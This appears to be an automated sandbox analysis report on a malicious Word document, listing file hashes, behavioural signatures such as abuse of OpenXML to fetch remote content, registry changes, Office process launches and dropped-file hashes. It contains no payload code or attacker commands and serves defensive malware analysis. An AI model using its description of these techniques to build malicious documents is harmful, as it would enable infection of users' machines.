Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-06-2024 20:46

General

  • Target

    17767305c2c5405843391c90c8165baf_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    17767305c2c5405843391c90c8165baf

  • SHA1

    b054020587cd294da3995c7b834788bd0b31064e

  • SHA256

    72dce1f47edcaa64212929c42533b306435b0e2b8fd4a496e92b1808617d7507

  • SHA512

    569535c50c50597191251471d4e34caee6aed62604d4e66986e35e5c0812835fe01f53e6041fded521e2683d2b5ac6c2adbfe939f70fe47d00b2765e0fc86815

  • SSDEEP

    1536:eterThwxEM5OsmqrmrAK9hbQ+HrTPGynK/dRYgjQVgs+07kVY/uocJanITRN8C:eUwxv5OsmqrmrAKHREdSgjQist4VaiaK

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\17767305c2c5405843391c90c8165baf_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2204
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2668
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:2964
    • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
      1⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:2272
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:632
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
      • Abuses OpenXML format to download file from external location
      • Enumerates system info in registry
      • Suspicious use of SetWindowsHookEx
      PID:2480
    • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      1⤵
        PID:2676

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

        Filesize

        128KB

        MD5

        88ccbc8cbd1fdef46f8e278420281e6e

        SHA1

        78bb12d171266ed099e951796ae5269f1a04092a

        SHA256

        e65acef4d32e9cfcb9c8d78a2ef5e87a7815d0af5187bac85a8a05f96ce64eef

        SHA512

        e678fb4bf536f2396a80025c91b158561a221dae579e546e9362753f52afd16a15b51e23d0ad810ba5d12e228ce07f596531d79be0c74bb0d26b3d4bd4ddf408

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{E64F4D88-ECE2-4002-ADBA-03538AC3E976}.FSD

        Filesize

        128KB

        MD5

        4f694468669df83d47767c827374d482

        SHA1

        6919eec81539fd79f0ed891ec51f281c74893eb9

        SHA256

        b147cb08f12587024c3cccb2f0ba6169b5b28e6baba9141778ce9755030d8ad1

        SHA512

        6e2d377165b99a125031d69f948753d8dd78ebd9d8a05a5980369e91a4fe9e59bef77c368239c5e82fbfd5b5c6f81d583ca4296927a915883e371e6a7a3431e7

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

        Filesize

        114B

        MD5

        15ed048f44e023f1a6820f094e286a7a

        SHA1

        bbe3b02e4c8fa20c36398cbf0ec275c49cbecec4

        SHA256

        f5db6faaaae42f04504b1ea49065c731edd4ee8c1382842747b4c80dbb83f749

        SHA512

        80cf53fc3e8a5599eb4c49184473a2040d43632bcb7578499f8504b08e4b149e2acf2d2883a2130cb7afacca63468514c3dc7a2fee51270abe0d3d84b4f2737a

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Filesize

        128KB

        MD5

        e7cfdf557f4a9d4f8ea5519cd8f62695

        SHA1

        f17579f2b0906e16ead8ddf44a4e498ddc063fd8

        SHA256

        6589a258829e82f6c5f89f4fea3f23e9378d2d01cf975647bdf52209ea7b9857

        SHA512

        73c5b76a843d1e5776a6bec52df9d1a64ee89ceede57d675e0fc9e7d0eec8936193b0b68d7f24f9b88e3fae39d0b15cb2d894c27958e41f4b2c355c375ac7e6e

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

        Filesize

        128KB

        MD5

        b0c97b75f5d890eee68e92efe99544e5

        SHA1

        e19cf08a9079ccc5db30b792ef5fe420f2f95d4f

        SHA256

        c377642a20ede5238fe4095612171cd5e95d58557d67a983a798153b33eeb422

        SHA512

        c93a033dfcfc614d6246d53a3e488a02ebe7fcf2a1d4e9503fa49081359fb57ad67f4cd8ca375bd7eb10c7dce278607d8a15fe94fe62c6b23c220ed6f1106a2f

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{39C49F59-BEEE-432E-94FD-FD76ECE326D6}.FSD

        Filesize

        128KB

        MD5

        3e4f548b17c29796ef0c19d3f74974e6

        SHA1

        f7ca1d384d1121b426ab2743f6ce8fee953d6fca

        SHA256

        93d12fbd474db1fb8608cb504140d8bf3ca10a43db87b698f0a4fa337fe95636

        SHA512

        7eab68c82ba7d6b3220a9c8c7e75f5c1e8ba2080b30310d4eee17ad0f0685fb21f8eabc214756e1f09da1af2e53e72f294cd639bfbcec5a4a6412b7ec7de4add

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{39C49F59-BEEE-432E-94FD-FD76ECE326D6}.FSD

        Filesize

        128KB

        MD5

        a4b38cffa42b5840481c259aeb2e0131

        SHA1

        59695ee59a239b34f81f08df41074ffdb162f253

        SHA256

        6c170da018a0d93652dd9f22f0978b5ab20ac02146a4d761401e96b58e05c84b

        SHA512

        47eea88a09bd895459632e23636ee2858c9f130e229946ef8626d91eccccd54d9b01985ab541ec61a398753731bb18034c4dd12b3582e6b5dbbe70c47ae5481a

      • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

        Filesize

        114B

        MD5

        d11a05a1d2346111d8dbad448ef4d9c1

        SHA1

        9f11c2af92197fd1ff7c46c66ffd2f49af5ef1e2

        SHA256

        50fe5f8252e4e929520c66f9c5285b9d56ce45adc034aca969df832aa6550937

        SHA512

        7337a18e88d93037f03a5aa95658db30692391147320298db4889b0cc6869761a5f810ad6315388770196e6434394a0db2923e069a2bf0093ae2507bc39f7365

      • C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

        Filesize

        143KB

        MD5

        8155f3f49d43b8a1fb926677d11b5811

        SHA1

        0a612324e216f0d3fb5fc3267006aec3ca6a314d

        SHA256

        2f0ffe3372abf6d585ff188dd9cd8361a9d114e45af4dbe7874ba8ad2b072d70

        SHA512

        54a60cede5e6f8707ed8fcdddd7ec4f762253f4707c4aca9325a25047a983bc36fce61fef1fa19f472ef1d27d1888cfcd684e36457a4a11cbc5a7e4be3201747

      • C:\Users\Admin\AppData\Local\Temp\{859DFB4B-2403-4603-9764-7855FF009C1F}

        Filesize

        128KB

        MD5

        a448363a5d14a0a934f8e09cec51d45f

        SHA1

        3bf5e84712eb6a6d48ab3feba3f31b47d102d623

        SHA256

        9067370e931d7b8d694b8c34cbf294a376e62e8f12feec7e89ee3f7994a0cd71

        SHA512

        39811df98c97f836f606f8766c9db18f884173157e094e04f74502778f0b06fcd3d181ebd07c5d84f687b14775a55f7395a26f4063e4995e79f7d19ce1968ef0

      • C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl

        Filesize

        36KB

        MD5

        953d9b9092dd18dfd78602b336efe373

        SHA1

        2c055e04ad6a1f67c93196f32db8e7f0655e21be

        SHA256

        1a93766e97b510129d57c9955774fef4ddffe6d8688b068c40b60a2035b1fa01

        SHA512

        7583445363c6954608a15ad125a2e4a0b7c0bc9afdf24fd35042dddd7c73d3d9a2037e5d4699aa254081cdb6c6c1e08cadea25f8e3abbdc155240d70ba419287

      • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

        Filesize

        20KB

        MD5

        2b90f38bb8430f229c1dd4af5363cac0

        SHA1

        76ff6efae08421bdc554820d552a6be093fabd2c

        SHA256

        1dbd7b37bfbf537878832fa2d9b9680403d0ca5021df9dc59000ba4d0221708d

        SHA512

        aa6ebf26cab0c216a69a31c6795842073a4978f560feec89e35e251a5273c1c03d378b8a6085b12b029da9e0d759ba48fa0b418879cf9aaa490eaefdb86c531a

      • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

        98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

      • memory/2204-0-0x000000002F3F1000-0x000000002F3F2000-memory.dmp

        Filesize

        4KB

      • memory/2204-61-0x0000000000380000-0x0000000000480000-memory.dmp

        Filesize

        1024KB

      • memory/2204-11-0x000000007141D000-0x0000000071428000-memory.dmp

        Filesize

        44KB

      • memory/2204-2-0x000000007141D000-0x0000000071428000-memory.dmp

        Filesize

        44KB

      • memory/2204-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB

      • memory/2964-1015-0x000000005FFF0000-0x0000000060000000-memory.dmp

        Filesize

        64KB